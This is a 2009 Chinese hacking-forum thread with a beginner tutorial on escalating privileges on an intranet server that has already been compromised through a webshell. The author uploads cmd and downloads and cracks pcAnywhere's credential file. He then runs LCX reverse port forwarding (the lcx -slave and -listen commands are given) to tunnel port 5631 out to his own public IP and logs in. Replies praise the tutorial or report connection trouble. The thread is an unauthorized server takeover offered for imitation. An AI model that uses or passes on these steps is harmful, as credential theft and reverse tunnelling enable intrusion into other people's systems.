Board logo

标题: [原创文章] pcanywhere之内网提权 [打印本页]

作者: huar    时间: 2009-7-5 21:35     标题: pcanywhere之内网提权

很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。* `7 _# m2 X1 \  J1 A
( c4 d7 T2 }8 h* P, n/ V5 z2 I5 x
提权方法:pcanywhere+LCX- o! q4 M6 n, Z3 Z5 Y; r5 U4 K
( g: i! m6 T/ r( U
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
  h# Z) V! O1 \- p' f( s
: X6 T2 k6 J/ w) X  u在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
4 N. k  [) R& o
, R4 @" k; G# H( ^! J[attach]1548[/attach]
+ d5 P( A; x3 {- e: _0 d; K9 j6 \查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。* F# F; r) Y4 N8 x5 e/ _7 w! _& U- X
4 E# x% j7 W3 P  E. w) `4 B
[attach]1549[/attach]! I: S4 o* J- N" b* p9 g
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。4 k2 e% j2 f$ R# b# Z

4 l1 W& d- n& Q" e& A[attach]1550[/attach]! t/ f7 |9 L9 q) v8 {0 s

+ g' m! a! ]- Z- N) P& b1 C7 S[attach]1551[/attach]
* B& L! m/ I7 \, O2 @7 E) O由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
) t( e$ @0 x7 g5 J! Z6 r! _/ C0 [) g2 j& X
[attach]1552[/attach]8 d) Y: e; p+ Y$ J! `
LCX的用法再简单说下:
$ C* O# L7 |9 @
6 e+ _* a* v" `1 U- M服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
& R) d2 l6 L) `/ r9 r9 q8 q: K' g5 p' h+ Q2 ^" v' L# q, c! j
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
( ^- K8 o5 C( _& c8 P
( g5 p4 n! h% j* ~: F: i6 T由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
/ b/ s( M) _2 u9 E& \1 G8 x) ?顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``- B- W2 |$ G2 U3 y6 }7 ]

5 U! L; e6 o8 u0 U[attach]1553[/attach]
+ B% R* D. Y" p& `
2 ]3 H' X7 Z) I. ~, ~[attach]1554[/attach]# m; `. K# I5 [  L
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。8 F! U+ x3 A( b2 K$ S# e

5 \& [4 D/ p% `" F) {% ^[attach]1555[/attach]" S! W5 p/ u. \. W0 b
' [& _' P2 O, N0 A9 S/ ?0 {$ x
[attach]1556[/attach], A6 @. p/ f5 M: [* j- j
我们本地连接试试,输入我们刚破解的账号密码
6 a$ \# I7 F& O$ `9 G: }# |. p
4 {" s  {, H0 Y' W: |  W[attach]1557[/attach]! b/ S+ l- x. V) i* i
呵呵``连接成功,服务器不错,又一个8核^︵^
6 X, U0 i& F9 @$ H  N2 I
2 C& N2 L; G& x, j[attach]1558[/attach]
1 j3 S8 r& w) b% ~- d; p% x
( E9 k/ x* Q5 {3 c[attach]1559[/attach]
作者: 柔肠寸断    时间: 2009-7-5 21:37

不错不错。。。你的貌似一直都是内网服务器哈
作者: huar    时间: 2009-7-5 21:41

哎。。。。运气不佳```老碰见内网的。。。。
作者: gassiori    时间: 2009-7-6 09:50

八核的哟
作者: 柔肠寸断    时间: 2009-12-15 15:36

顶起。。。。。。。。。
作者: killadmin    时间: 2010-1-21 20:01

但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.




欢迎光临 【3.A.S.T】网络安全爱好者 (http://www.3ast.com/) Powered by Discuz! 7.2